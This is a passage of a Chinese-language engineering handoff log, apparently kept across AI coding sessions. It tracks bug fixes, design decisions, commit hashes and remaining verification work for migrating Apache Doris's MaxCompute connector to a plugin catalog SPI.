对抗或经用户定 skip)→ 实现 → 守门(编译+UT+checkstyle+import-gate+mutation)→ impl-review → 独立 commit + hash 回填 + tracker。**动手前按指针核码(Rule 8)**——下列 file:line 为第 12 次 recon,G0 经验示其可漂移。 +> **G0 经验**(auto-memory [[catalog-spi-connector-session-tz-gotcha]]):连接器**禁 import fe-core**(import-gate);mutation 改 API 时用 **in-place cp 备份**(revert-to-HEAD 不可编译);先验 anchor 务必核码。 + +**本批三 issue(独立、可并行):** + +1. **G6 FIX-CREATE-CATALOG-VALIDATION(Tier 2,major)— 连接器(fe-connector-maxcompute)**:CREATE CATALOG 属性校验缺失。`MaxComputeConnectorProvider` **未 override `validateProperties`**(继承 SPI no-op `ConnectorProvider:74-76`;jdbc/es/trino 都 override)→ required PROJECT/ENDPOINT、split_byte_size≥10485760 floor、split_strategy、account_format∈{name,id}、connect/read timeout>0、retry_count>0、`checkAuthProperties`(`MCConnectorClientFactory.checkAuthProperties:42-78` **定义但零调用**)全不在 CREATE 时校验 → use-time 晚失败 / 静默接受非法(account_format='foo'→默认 DISPLAYNAME;负 timeout)。legacy `MaxComputeExternalCatalog.checkProperties:387-457`。**修**=实现 `MaxComputeConnectorProvider.validateProperties`(或 preCreateValidation)镜像 legacy 六校验 + wire `checkAuthProperties`。 + +2. **G5 FIX-AGG-COLUMN-REJECT(Tier 2,minor)— fe-core**:`CREATE TABLE (c INT SUM)` 聚合列拒绝丢失(证伪 P2-8「非-OLAP 路径已覆盖」)。链:`ConnectorColumn` 无 aggType 载体 → `CreateTableInfoToConnectorRequestConverter:90-92` 丢 aggType → `MaxComputeConnectorMetadata.validateColumns:476-498` 不查 → nereids `ColumnDefinition.validate(isOlap=false):358-411` 不拒 bare non-key aggType(`validateKeyColumns:1083` 拒但 gated 在 ENGINE_OLAP-only 块、非-OLAP 不可达)。legacy `MaxComputeMetadataOps:426-429` 拒。**修**=FE-core guard(convert/createTable 路径对 maxcompute engine 拒非空 aggType,因 ConnectorColumn 无 aggType 连接器看不到)。**⚠️ 设计定夺点**:FE-core guard(不动 SPI,倾向)vs 改 SPI 加 `ConnectorColumn.aggType`(如 P2-8 加 isAutoInc,见 [[catalog-spi-p2-ddl-decisions]])。 + +3. **G7 FIX-VOID-TYPE-MAPPING(Tier 2,minor)— 连接器/fe-core 边界**:ODPS `VOID` → 新路映 `UNSUPPORTED`(legacy=`Type.NULL`)。链:`MCTypeMapping:51-52` emit `of("NULL")` → `ConnectorColumnConverter.convertScalarType` 无 "NULL" case → `ScalarType.createType("NULL")` 抛(只认 "NULL_TYPE")被 catch→UNSUPPORTED。次生缺陷:未知 OdpsType legacy 硬抛、新路静默 UNSUPPORTED。**修**=加 "NULL" case 返 `Type.NULL`,或 `MCTypeMapping` emit `of("NULL_TYPE")`(设计时定哪侧)。 + +> G6/G5/G7 完整证据 + 其余待办(G2/GC1/T3/DOC 的 file:line + 修法)见下方折叠「第 12 次 handoff」§下一 session 待办,未变。 + +
+ +--- + +
📅 历史:第 12 次 handoff(Batch-D 红线扩充查出 11 gap + 2 critic;G8 已修,G0 见上) + +# 🔥 第 12 次 handoff(2026-06-08,覆盖)— Batch-D 红线扩充查出新 gap 修复 campaign + +> **本 session 主题**:执行横切「**Batch-D 红线扩充**」——跑 clean-room 对抗 workflow `wbw4xszrg`(117 agent,13 carrier-unit × inventory→adversarial-verify + 3 critic)复查 Batch-D 设计「zero survivor」声明的**行为逻辑副本**层面(非仅实例化链)。**查出 11 gap + 2 critic-only finding。Critic-2 独立复核:13 条 per-fix 等价物全 present+wired(前修无回退)。** 这些是 per-fix review 漏掉的**新**发现。 +> **⚠️ 重大发现**:其中 **GAP8 是 live 静默丢行回归**(已修,见下);G5 证伪 P2-8「聚合列已覆盖」;G6 暴 CREATE CATALOG 校验缺失。 + +## ✅ 本 session 已完成 +- **G8 FIX-NONPART-PRUNE-DATALOSS(blocker/correctness)DONE @`e1760d38d86`(+回填 `265cd3fa70f`)**:非分区 plugin 表 `SELECT...WHERE` 静默返 **0 行**。根因=`PluginDrivenExternalTable.supportInternalPartitionPruned()` 返 `!partCols.isEmpty()`(非分区=false) → `PruneFileScanPartition` else 支覆写 `SelectedPartitions(0,{},isPruned=true)` → `PluginDrivenScanNode.getSplits` 短路 0 split。**通用插件层**(CatalogFactory SPI_READY_TYPES={jdbc,es,trino,max_compute} 全经 PluginDrivenExternalTable→LogicalFileScan→PluginDrivenScanNode;当前仅 MC 翻闸暴露)。坏 override=`35cfa50f988`(FIX-PART-GATES,dormant)+`072cd545c54`(P1-4 加短路激活)。修=Option A:`supportInternalPartitionPruned()` 返**无条件 true**(镜像 legacy MaxComputeExternalTable/Iceberg;非分区 pruneExternalPartitions 返 NOT_PRUNED 扫全表)。设计验证 `wijd3qgk0`(4 lens design-sound,1mF+3sF 折入) + impl-review `wza2khdb2`(2 lens approve,0mF)。repro=翻转 `PluginDrivenExternalTablePartitionTest` 钉错不变式断言(mutation 还原即红)。auto-memory [[catalog-spi-nonpartitioned-prune-dataloss]]。 + - 守门:UT 6/6+5/5、mutation 向红、checkstyle 0、import-gate 净。 + +## 👤 用户定夺(2026-06-08,campaign 范围) +- **G8 = Fix now(repro 先行)** → 已完成。 +- **其余 = Fix Tier 1+2,Tier 3 接受+登记 deviation**。 + +## 🎯 下一 session = 续做 gap 修复 campaign(live tracker = `plan-doc/task-list-batchD-redline-gaps.md`) + +> **每 issue 走既有方法论**:独立设计文档 `tasks/designs/P4-T06e--design.md` → 设计验证 workflow(clean-room 对抗)→ 实现 → 守门(编译+UT+checkstyle+import-gate+mutation)→ impl-review workflow 收敛 → 独立 commit(`[P4-T06e]`)+ hash 回填 + 更 tracker。 +> **⚠️ Ultracode 现已关**:跑 workflow 需用户显式 opt-in(或用户说「use a workflow」)。若关态,design-verify/impl-review 可改用单/双 Agent 对抗替代,或先问用户是否要 workflow。 +> 全量 gap 证据:workflow 返回 JSON 在 `/tmp/claude-1000/-mnt-disk1-yy-git-wt-catalog-spi/.../tasks/wbw4xszrg.output`(若 /tmp 清,speca 全在 tracker;摘录曾在 `/tmp/wf_gaps.txt`/`/tmp/wf_critics.txt`)。每 gap 带 file:line + parity + evidence。 + +**按优先序待办(Tier 1+2 fix + Tier 3 DV + 原 doc 交付):** + +1. **G0 FIX-DATETIME-PUSHDOWN-FORMAT(Tier 1,major correctness/perf)— 下一个,本 session 已开始 design 调研**: + - 症状:DATETIME/TIMESTAMP/TIMESTAMP_NTZ 谓词下推坏。**两 delta**: + - **delta-1(format)**:`MaxComputePredicateConverter.formatLiteralValue:201` 用 `String.valueOf(literal.getValue())`,而 literal value 是 `java.time.LocalDateTime`,其 `toString()` 是 **'T' 分隔 + 变精度**(`"2023-02-02T00:00"`);喂 `DATETIME_3/6_FORMATTER`(`"yyyy-MM-dd HH:mm:ss.SSS"` 空格分隔)→ `convertDateTimezone:259` 的 `LocalDateTime.parse` **抛 DateTimeParseException**(非 UTC)被 `convert():86` catch→**整 conjunct 树降 NO_PREDICATE**(谓词永不下推=perf 回归);UTC 路(`convertDateTimezone:256` sourceTZ==UTC 短路)推 **malformed 字面量** `col=="2023-02-02T00:00"` 到 ODPS(结果未定,可能错/可能 ODPS 报错)。legacy `MaxComputeScanNode:558-593` 用 `dateLiteral.getStringValue(DatetimeV2Type(3|6))`(空格分隔定长)正确。 + - **delta-2(TZ source)**:连接器 `sourceTimeZone` = `MaxComputeScanPlanProvider:287-295` 经 `MCConnectorEndpoint.resolveProjectTimeZone(endpoint)`(**project-region TZ**);legacy `convertDateTimezone` 用 `DateUtils.getTimeZone()`(**session TZ**)。format 修后若 TZ 仍错→**丢行**。 + - 修法方向(待设计):① format=直接对 `LocalDateTime` 用目标 formatter(不走 toString()→reparse),即在 DATETIME/TIMESTAMP 分支把 value 当 LocalDateTime 格式化 + TZ 转换;② TZ source=改用 session TZ——**需查连接器如何拿 session TZ**(ConnectorSession 是否带 timezone?现 resolveProjectTimeZone 在 `MaxComputeScanPlanProvider`;legacy 用 ConnectContext session var,连接器不可直达 fe-core)。**关键调研点**:ConnectorSession.getSessionProperties() 是否含 time_zone(参 P3-9 limit-opt 经 session prop 读 var 的约定)。 + - 已读文件:`MaxComputePredicateConverter.java`(formatLiteralValue:195-252 / convertDateTimezone:254-263 / ctor:69-74 / formatters:55-58 / convert catch:84-89)。**待读**:`MaxComputeScanPlanProvider.java:131-133`(dateTimePushDown)`:274-295`(convertFilter+sourceTZ)、`MCConnectorEndpoint.resolveProjectTimeZone:111-125`、`ExprToConnectorExpressionConverter.convertDateLiteral:309-321`(fe-core 存 LocalDateTime)、ConnectorSession 接口(找 timezone)、legacy `MaxComputeScanNode:529-613`(对照)、`DateUtils.getTimeZone:403-408`。**无连接器测覆盖 datetime 格式**——补 `MaxComputePredicateConverter` UT 钉确切下推串 + mutation。真值闸 live ODPS=DV(datetime 谓词正确下推 + 不丢行,跨 UTC/非-UTC project TZ)。 +2. **G6 FIX-CREATE-CATALOG-VALIDATION(Tier 2,major)**:CREATE CATALOG 属性校验缺失。`MaxComputeConnectorProvider`(fe-connector-maxcompute) **未 override `validateProperties`**(继承 SPI no-op `ConnectorProvider:74-76`,cf. jdbc/es/trino 都 override)→ required PROJECT/ENDPOINT、split_byte_size≥10485760 floor、split_strategy、account_format∈{name,id}、connect/read timeout>0、retry_count>0、`MCUtils.checkAuthProperties`(`MCConnectorClientFactory.checkAuthProperties:42-78` **定义但零调用**)全不在 CREATE 时校验 → 退化 use-time 晚失败 / 静默接受非法(account_format='foo'→默认 DISPLAYNAME;负 timeout)。legacy `MaxComputeExternalCatalog.checkProperties:387-457`。修=实现 `MaxComputeConnectorProvider.validateProperties`(或 preCreateValidation)镜像 legacy 六校验 + wire checkAuthProperties。 +3. **G5 FIX-AGG-COLUMN-REJECT(Tier 2,minor)**:`CREATE TABLE (c INT SUM)` 聚合列拒绝丢失(**证伪 P2-8「非-OLAP 路径已覆盖」**)。链:`ConnectorColumn` 无 aggType 载体 → `CreateTableInfoToConnectorRequestConverter:90-92` 丢 aggType → `MaxComputeConnectorMetadata.validateColumns:476-498` 不查 → nereids `ColumnDefinition.validate(isOlap=false):358-411` 不拒 bare non-key aggType(`validateKeyColumns:1083` 拒但 gated 在 ENGINE_OLAP-only 块、非-OLAP 不可达)。legacy `MaxComputeMetadataOps:426-429` 拒。修=FE-core guard(convert/createTable 路径对 maxcompute engine 拒非空 aggType,因 ConnectorColumn 无 aggType 连接器看不到)。 +4. **G7 FIX-VOID-TYPE-MAPPING(Tier 2,minor)**:ODPS `VOID` → 新路映 `UNSUPPORTED`(legacy=`Type.NULL`)。链:`MCTypeMapping:51-52` emit `of("NULL")` → `ConnectorColumnConverter.convertScalarType` 无 "NULL" case → `ScalarType.createType("NULL")` 抛(只认 "NULL_TYPE")被 catch→UNSUPPORTED。次生:未知 OdpsType legacy 硬抛、新路静默 UNSUPPORTED。修=加 "NULL" case 返 Type.NULL,或 MCTypeMapping emit `of("NULL_TYPE")`。 +5. **G2 FIX-PREDICATE-COLGUARD(Tier 2,minor,多半不可达)**:列不存在守卫反转。legacy `MaxComputeScanNode:415-421/478-484` 谓词引用未知列→抛→丢谓词;新路 `MaxComputePredicateConverter.formatLiteralValue:204-206` odpsType==null 静默引号化→下推非法谓词。实务 bound 谓词只引真列、columnTypeMap key 集与 legacy 一致→**多半不可达**;修=加 containsKey 守卫(throw/skip)对齐 legacy。低优,可与 G0 合并(同文件)。 +6. **GC1 FIX-BLOCKID-CAP-CONFIG(Tier 2,minor)**:写 block-id 上限硬编 `20000`(`MaxComputeConnectorTransaction.java:72,146` `MAX_BLOCK_COUNT=20000L`),无视 legacy `Config.max_compute_write_max_block_count`(`MCTransaction:165`,可调)→ 调优部署静默回归。修=读 Config(连接器如何拿 fe Config?可能经 connector context/property 透传,需查)。 +7. **T3 Tier-3 接受项 → 登记 deviation(不修,用户定)**: + - GAP3 CREATE DB 非-IFNE:`ERR_DB_CREATE_EXISTS`(1007/HY000 本地预抛)→透传 ODPS DdlException(P2-6 已注 pre-existing)。 + - GAP4 DROP TABLE 非-IF-EXISTS+远端缺:`ERR_UNKNOWN_TABLE`(1109/42S02)→通用 DdlException(本地名)。 + - GAP9 SHOW PARTITIONS `LIMIT`:legacy paginate-then-sort → 新路 sort-then-paginate(新路更合 ORDER-BY-LIMIT)。 + - GAP10 partitions() TVF:schema-分区但零实例表 legacy 抛→新路返 0 行(已有 in-code 注释声明 intentional)。 + - 动作:在 `plan-doc/deviations-log.md`(或既有 deviations 文档)登记这 4 条 + 各 file:line + 接受理由。 +8. **DOC:Batch-D redline 扩充(原任务交付,仍欠)**:把上述全部行为逻辑副本作为 **must-land-before-delete 红线** 补入 `plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md` §1/§2(镜像现有 MaxComputeScanNode 红线注格式);并**更正 scan-node 红线注**——critic-3 证其漏列 **LIMIT-split 优化(第 3 行为副本)**(等价物在 P3-9,注应 cite)。另 critic-2 提醒:`MetadataGenerator`/`PartitionsTableValuedFunction` 仍有 live-but-dead legacy refs,Batch-D 删 legacy 类前须连这些 reverse-ref 一并删否则不编译(已在 §2,复核)。 + +## ⚙️ 操作须知(本 session 新增/复用) +- maven 必绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml` + `-pl :fe-core -am`(改连接器 `:fe-connector-maxcompute`)+ `-Dmaven.build.cache.enabled=false`;读真实 `Tests run:`/`BUILD`/`MVN_EXIT`,勿信后台 task exit code。checkstyle `-pl :fe-core checkstyle:check`;import-gate `bash tools/check-connector-imports.sh`。 +- 分支 `catalog-spi-05`,本地未 push。本 session 2 commit(G8 fix + 回填)。 +- auto-memory 新增 [[catalog-spi-nonpartitioned-prune-dataloss]]。clean-room 对抗偏好见 [[clean-room-adversarial-review-pref]];测基建坑见 [[catalog-spi-fe-core-test-infra]]。 + +
+ +--- + +
📅 历史:第 11 次 handoff(P3-11/P3-12 完成 → P4-rereview triage 全 code-complete) + +## 📅 最后一次 handoff + +- **日期**:2026-06-08(第 11 次 handoff) +- **本 session 主题**:**P3-11 + P3-12 完成 → 🎉 P3 全清 + 整个 P4-rereview triage(P0-1..3 / P1-4 / P2-5..8 / P3-9..12)全部完成**。各走 设计文档 →(P3-11)设计验证 workflow → 实现 → 守门 → impl-review workflow → 独立 commit + hash 回填。live tracker = `plan-doc/task-list-P4-rereview.md`。 + - **P3-12 FIX-POSTCOMMIT-REFRESH** ✅ `1f2e00d3696`(+`2c4015ac7de` 回填)(NG-8/F15=F21 minor):**无产线逻辑改动**——仅 `PluginDrivenInsertExecutor.doAfterCommit` Javadoc(`:164-176`) 从「只讲 JDBC_WRITE」泛化到覆盖 MC connector-transaction 路径。对抗性安全核查 inline(`handleRefreshTable` 只刷缓存/写 refresh editlog、丢失自愈)。[D-034]/[DV-018]。 + - **P3-11 FIX-BATCH-MODE-SPLIT** ✅ `ac8f0fc15eb`(+`2a43abc6d76` 回填)(NG-7/F6=F13 minor):**用户定「实现 batch SPI 路径」**(Shape A 薄 SPI + fe-core 编排、逐字镜像 legacy)。SPI +2 additive default(`supportsBatchScan`/`planScanForPartitionBatch`,零破坏其余 6 连接器)+ 连接器 `supportsBatchScan`=`fileNum>0` + fe-core `PluginDrivenScanNode` 三 override(`isBatchMode`含 SF-1 null-guard / `numApproximateSplits` / `startSplit` 异步分批)+ 纯静态 `shouldUseBatchMode`。设计验证 `wcpg9lblj` + impl-review `wve7y1jst` 各 GO-WITH-EDITS 折入。守门 mutation 5/5。[D-035]/[DV-019]。 +- **方法论**:每 issue = 设计文档 → 设计验证 workflow(多 lens clean-room 对抗)→ 实现 → 编译+UT+checkstyle+import-gate+mutation → impl-review workflow 收敛 → 独立 commit(fix)+ commit(hash 回填)。 +- **分支**:`catalog-spi-05`(本地,未 push)。本 session 4 commit(P3-11/P3-12 各 fix + hash 回填)。**累计本轮 triage 共 12 issue 全 DONE。** +- **operational 坑(auto-memory `doris-build-verify-gotchas` 已更新)**:mutation 跑中 `/mnt/disk1` **系统级 100% 满**(1.9T/2T,非本 repo 数据——repo target 仅 ~3.65G)致 `cp` 还原失败一度 **truncate 产线文件**;已从 `/dev/shm`(RAM) 备份还原、重跑确认。教训=mutation 还原备份须放 RAM/异盘 + mutation 跑带 `-Dcheckstyle.skip=true`。**⚠️ 磁盘当前 97%,bulk 占用非本 repo,需用户排查。** +- **复审已验层(legacy parity 达成,静态层面)**:返回行结果正确、descriptor/JNI/BE 线、事务生命周期、schema cache、editlog/replay、读裁剪下推(DG-1)、limit-split 三重闸(P3-9)、isKey 元数据(P3-10)、batch-mode 异步 split(P3-11)、post-commit swallow(P3-12)、写分发/静态分区 bind/INSERT OVERWRITE(P0)——均独立验为与 legacy 等价。**triage 已 code-complete;剩余 = ① live e2e 终验(真值闸,真实 ODPS)② Batch-D 删 legacy ③ 若干横切开放项(见下)。** --- -## 🧠 给下一个 agent 的 meta 建议 +# 🎯 下一 session = triage 已 code-complete,进入「终验 + 收尾」阶段 + +> **本轮 P4-rereview triage 全部完成**:P0-1..3(写 blocker)/ P1-4(读裁剪)/ P2-5..8(DB-DDL/CTAS)/ P3-9..12(写并行/读默认/minors)共 **12 issue 全 DONE**,逐条见下面 🔴/🟠/🟡 段。剩余工作不再是「修 issue」,而是三条收尾线: +> 👉 **下一 session 第一步(按价值/依赖排序)**: +> 1. **🅰 live e2e 终验(真实 ODPS)= 翻闸真正完成门**(最高价值,CI 跳)。所有静态修复的真值闸须 live 验:写 blocker(动态/静态分区、INSERT OVERWRITE,DV-013/014)+ 读裁剪(DV-015)+ limit-split(DV-016)+ DESCRIBE isKey(DV-017)+ post-commit swallow(DV-018)+ batch-mode 大分区(DV-019)+ CAST 谓词不丢行(DV-020:STRING 列 `"5"/"05"/" 5"` 的 `CAST(code AS INT)=5` 返回全部 3 行)。**需真实 ODPS 环境/凭证**——多半要用户提供或在带 ODPS 的环境跑。runbook 见历史 HANDOFF / decisions-log。 +> 2. **🅱 Batch-D = 删 legacy MaxCompute(21 文件)**。**所有 per-fix 红线门现已全清**(P0 写分发/overwrite/bind + P1 读裁剪 + P3-11 batch-mode),故 Batch-D 已**解锁**;但执行仍**gated on 🅰 live e2e**([D-027])。设计 = `plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md`(其 §1「zero survivor」声明已就 MaxComputeScanNode 加红线限定,仍须复查 PhysicalMaxComputeTableSink/allowInsertOverwrite/bindMaxComputeTableSink 三处,见 §横切)。 +> 3. **🅲 横切开放项**(静态、不需 ODPS,可随时清,见下)。 +> +> 📋 **待用户拍板 / 待清的开放项**: +> - **(决策) P2-7 KNOWN PRE-EXISTING GAP**:非-IFNE + FE-cache 命中但远端缺 → legacy 抛 `ERR_TABLE_EXISTS_ERROR`、cutover 静默建表。全 parity 可在 `PluginDrivenExternalCatalog.createTable` 的 `exists && !isIfNotExists()` 加 FE 侧 throw。**待定 fix vs 接受+DV**(见 FIX-CTAS review-rounds)。 +> - **(doc-sync 欠账 — P2 session 遗留,已核实仍未落)**:decisions-log 登记 P2 三处 SPI 改动(4 参 `dropDatabase` / `supportsCreateDatabase` / `ConnectorColumn.isAutoInc`);deviations-log 登记(P2-7 非-IFNE 文案差、CTAS KNOWN GAP、P2-8 auto-inc 接受项);更正 `P4-maxcompute-migration.md` 的「nereids 上游已拒 auto-inc」假声明(P2-8 已证伪:nereids 仅拒 generated 列、不拒 bare auto-inc);T06c §5「记 OQ/可接受」措辞。**注:P3-9/P3-10 的 doc-sync(D-032/D-033/DV-016/DV-017)本 session 已落。** +> - **(复查) F9 CAST 谓词剥壳下推**(`ExprToConnectorExpressionConverter:108-109`, confirms 3/3, correctness/丢行风险):虽归「已登记降级」,建议二次确认真安全 / 真已登记。 +> - **(终验) live e2e(真实 ODPS)是翻闸真正完成门**(= 上面 🅰):写 blocker(动态/静态分区、INSERT OVERWRITE)+ 读裁剪 + limit-split + DESCRIBE + post-commit swallow + batch-mode 大分区 + CAST 谓词不丢行 的 DV 真值闸(**DV-013..020**)须 live 验,CI 跳。 + +> 来源全部出自 `plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md`(每条带 `file:line` + cutover↔legacy diff + 处置建议 + 历史交叉核对证据)。下面是浓缩可执行清单——**动手前按指针核码(Rule 8)**。 +> **⚠️ 把 newGaps∪disagreements 当一个"必须 triage"集**:同一根因被两个审阅者按各自查到的历史 artifact 分别归 new-gap / disagreement(静态分区 bind F19=F48;CREATE DB 预检 F23=F26),别被 status 标签的细分误导。 +> **每 issue 走既有流程**:设计→改→编译+UT+mutation→对抗 review 收敛→独立 commit + hash 回填。 + +## 🔴 P0 — 写路径 3 个 blocker(✅ 全清,2026-06-07) + +- [x] **FIX-OVERWRITE-GATE**(blocker, F42/F47)✅ **DONE @`59699a62f33`**(本轮 live tracker = `plan-doc/task-list-P4-rereview.md`;详见 `plan-doc/reviews/P4-T06e-FIX-OVERWRITE-GATE-review-rounds.md`)。⚠️**下面这句已过时**:实际未用 bare instanceof(round-1 对抗 review 证伪——会令 jdbc 静默退化 overwrite→plain INSERT 丢数据),改为 **Option A:新增 SPI capability `supportsInsertOverwrite()`(ConnectorWriteOps 默认 false / MaxCompute=true),网关经能力守门**。〔原始计划:〕`InsertOverwriteTableCommand.allowInsertOverwrite:315-323` 加 `PluginDrivenExternalTable` 分支(keyed on SPI 泛型类型,对齐 FIX-PART-GATES 决策①)。下层 OVERWRITE 机器(`:420-440`)已完整接好、只是被顶层网关挡得到不了(典型"分发只接一半")。**Batch-D 红线**:删 legacy `MaxComputeExternalTable` 分支前必须先加 PluginDriven 分支。测试(Rule 9):翻闸表 INSERT OVERWRITE 修前红(`AnalysisException "...only support OLAP..."`)、修后过网关 + 静态分区 spec 仍流。 +- [x] **FIX-WRITE-DISTRIBUTION**(blocker+major, F17/F18/F43)✅ **DONE @`f0adedba20c`**(1 轮收敛 0 must-fix;详见 `plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION-review-rounds.md`、[D-029]/[DV-013])。做法 = **Option A:新增 SPI capability `SINK_REQUIRE_PARTITION_LOCAL_SORT`**(`ConnectorCapability` 默认不声明 / MaxCompute `getCapabilities()` 声明它 + `SUPPORTS_PARALLEL_WRITE`),`PluginDrivenExternalTable.requirePartitionLocalSortOnWrite()` 读之,`getRequirePhysicalProperties()` 重写 legacy 3 分支。**关键修正 vs legacy**:分区列→child output 索引按 **cols 位置**(通用 sink child 投影到 cols 序)非 legacy full-schema。〔原始计划:〕`PhysicalConnectorTableSink.getRequirePhysicalProperties:114-121` 照搬 legacy `PhysicalMaxComputeTableSink:111-155` 三分支。**⚠️ 不只翻 `SUPPORTS_PARALLEL_WRITE`**——那缺 local-sort,动态分区照样 "writer has been closed"。**Batch-D 红线**:删 `PhysicalMaxComputeTableSink`(唯一逻辑副本)须待本 fix + P0-3 双落。**真值闸**:live e2e 跨多动态分区无 "writer has been closed" + 并行吞吐(CI 跳,须与 P0-3 一并 live 验)。 +- [x] **FIX-BIND-STATIC-PARTITION**(blocker, F19/F48)✅ **DONE @`7cc86c66440`**(3 轮收敛 0 mustFix;[D-030]/[DV-014];详见 `plan-doc/reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md`)。⚠️**下面原始计划不完整**——只剔除静态分区列不够:MaxCompute BE/JNI writer **按位置**映射数据到完整表 schema,故**所有** MC 写(不止静态/分区)须投影 full-schema 序(非分区/重排或部分显式列名否则静默错列/丢列)。实际做法 = **新增 SPI cap `SINK_REQUIRE_FULL_SCHEMA_ORDER`**(MaxCompute 声明 / JDBC 不声明),`bindConnectorTableSink` 据此分支(true→full-schema 投影镜像 legacy `bindMaxComputeTableSink` 全写形 + 剔除静态分区列;false→cols 序 JDBC/ES)+ `InsertUtils` VALUES 分支 + **回退 P0-2 分布索引 cols→full-schema**([D-030] 回退 [D-029])。判别键三轮 static→partitioned→capability。〔原始计划:`BindSink.bindConnectorTableSink` 剔除 `getStaticPartitionKeyValues().keySet()` + `InsertUtils:377-389` VALUES 分支〕。**doc-sync 已落**:cutover-design §4.2 + FIX-WRITE-DISTRIBUTION-design「index-by-cols」superseded 更正(随本 session commit)。**Batch-D 红线**:删 legacy `bindMaxComputeTableSink`/`PhysicalMaxComputeTableSink` 须待本 fix 落(已落)。**真值闸**:live e2e(p2 `test_mc_write_insert` Test 3/3b + `test_mc_write_static_partitions`);bind 投影无 fe-core analyze harness 单测 = DV-014。 + +## 🟠 P1 — 分区裁剪下推证伪(disagreement, major)✅ DONE 2026-06-08 + +- [x] **FIX-PRUNE-PUSHDOWN**(F1/F7)✅ **DONE @`072cd545c54`**(1 轮收敛 0 mustFix;[D-031]/[DV-015];详见 `plan-doc/reviews/P4-T06e-FIX-PRUNE-PUSHDOWN-review-rounds.md`)。**用户批准「Fix it」**。做法 = (a) `PluginDrivenScanNode` 加 `selectedPartitions` 字段/setter + 三态 `resolveRequiredPartitions`(NOT_PRUNED→null / pruned-非空→names / pruned-空→`getSplits` 短路无 split,镜像 legacy `MaxComputeScanNode:718-731`);`PhysicalPlanTranslator` plugin 分支注入 `setSelectedPartitions(fileScan.getSelectedPartitions())`;(b) **additive 6 参 SPI overload** —— `ConnectorScanPlanProvider.planScan(...,List requiredPartitions)` **default** 委托 5 参(零破坏 es/jdbc/hive/paimon/hudi/trino,唯 MaxCompute override),MaxCompute `toPartitionSpecs` 喂**两** read-session 路径(标准 `:201` + limit-opt `:320`,替 `Collections.emptyList()`),空选短路上移 fe-core。**契约**:null/空=全部、非空=子集、零分区 fe-core 短路不下达 SPI。**已更正**「production CLEAN / pruning 不变式 clean」裁决(FIX-PART-GATES design/review-rounds ⚠️ + D-028 ⚠️,见 doc-sync)。**Batch-D 红线**:删 legacy `MaxComputeScanNode`(读裁剪逻辑副本)须待本 fix 落(已落)。**真值闸**:live e2e p2 `test_max_compute_partition_prune.groovy` + EXPLAIN/profile 证仅扫目标分区(DV-015;CI 跳)。**与 NG-7 batch-mode 解耦但为其前置。** + +## 🟠 P2 — DB-DDL / CTAS 语义回归 ✅ 全 DONE(P2-5/6/7/8,详见 task-list-P4-rereview.md + 4 份 review-rounds) + +- [x] ✅ `99d5c9d527c` **DROP DB FORCE 级联**(disagreement major, F22/F27):先用真实 ODPS 验 `schemas().delete` 对非空库行为。若拒删 → 在 `PluginDrivenExternalCatalog.dropDb:337-355` 的 `force==true` 时枚举+dropTable(或扩 SPI 带 force/cascade)。若不支持 → 至少 fail-loud(force+非空库抛明确错)+ 登记 deviation。**别把 T06c §5"记 OQ/可接受"当作已解决**(后续对抗 review 已推翻该定级)。 +- [x] ✅ `ff52f8fd478`(能力门闸 supportsCreateDatabase,jdbc/es/trino 字节不变)**CREATE DB IF NOT EXISTS 远端预检**(disagreement major, F26/F23):重开 DDL-C4。`createDb:312-326` 在 `ifNotExists && getDbNullable==null` 时先查 `connector...databaseExists`(已暴露、无需改 SPI 签名)。UT + mutation。或登记 deviation——别留"孤儿修 verdict"(task-list `:12` 称 6/6 完成但此条无 fix commit、亦无 deviation)。 +- [x] ✅ `7051b75c197`(FE-only;⚠️ 暴 KNOWN PRE-EXISTING GAP:非-IFNE+本地-only 不 fail-loud,待用户定)**CTAS IF-NOT-EXISTS 误写已存在表**(disagreement, DDL-C5 minor→**major**, F33):`createTable:264-300` 区分"新建 vs 已存在"——IF-NOT-EXISTS 命中 → 返回 true + 跳 editlog + 跳 `resetMetaCacheNames`(镜像 legacy `createTableImpl:179-197` → `ExternalCatalog:1063-1075`)。测试:CTAS-IF-NOT-EXISTS 对已存在表**不**INSERT + editlog 未写。(历史只分析了 editlog 冗余那半、漏了数据变更后果。) +- [x] ✅ `4aa680f3e3b`(加 SPI 字段 ConnectorColumn.isAutoInc)**AUTO_INCREMENT 拒绝丢失**(disagreement minor, F24):定夺 (a) `ConnectorColumn` 加 `isAutoInc` 透传 + `validateColumns` 重校验;或 (b) 接受+登记 deviation + 更正 `P4-maxcompute-migration.md:117` 的假声明("nereids 上游已拒"对 auto-inc 为假)。聚合列那半已被非-OLAP key 路径覆盖、无需单独修。 + +## 🟡 P3 — 写并行 / 读默认 / minors + +- [x] **limit-split 默认反转**(major, F11)✅ **DONE @`952b08e0cc8`**(1 轮 impl-review 收敛,1 mustFix→补测;[D-032]/[DV-016];详见 `plan-doc/reviews/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-review-rounds.md`)。**用户定 Fix(恢复三重闸)**。做法 = **连接器局部、无 SPI 变更**:① 加 hardcode 常量 `ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION` 经 `ConnectorSession.getSessionProperties()`(live 由 `from(ctx)`→`VariableMgr.toMap` 填,禁依赖 fe-core `SessionVariable`,同 JDBC 约定)读 gate(1);② 实 `checkOnlyPartitionEquality` 遍历 `ConnectorExpression` 树镜像 legacy `checkOnlyPartitionEqualityPredicate`;③ 纯静态 `shouldUseLimitOptimization` 合成 gate(1)&&gate(3)&&gate(2),默认 OFF=保守回退 legacy。**并闭 minors F2/F12**(旧恒 false stub)。〔原始计划:透传 session-var + 实现 checkOnlyPartitionEquality 恢复三重闸;或接受"默认优化无过滤 LIMIT"+DV〕。**真值闸**:CI-skip live e2e(var OFF→多 split / var ON+分区等值+LIMIT→单 row-offset split,EXPLAIN/profile 证)= DV-016 wiring 半。 +- [x] **isKey=false 元数据分歧**(minor, F3/F10)✅ **DONE @`1b44cd4f065`**(设计验证+impl review 各 0 mustFix;[D-033]/[DV-017];详见 `plan-doc/reviews/P4-T06e-FIX-ISKEY-METADATA-review-rounds.md`)。**用户定 Fix(isKey=true)**。做法 = **连接器局部、无 SPI 变更**:抽 `buildColumn(...)` 静态助手用 6 参 ctor 置 isKey=true,`getTableSchema` data+partition 两 loop 经之(converter 已透传 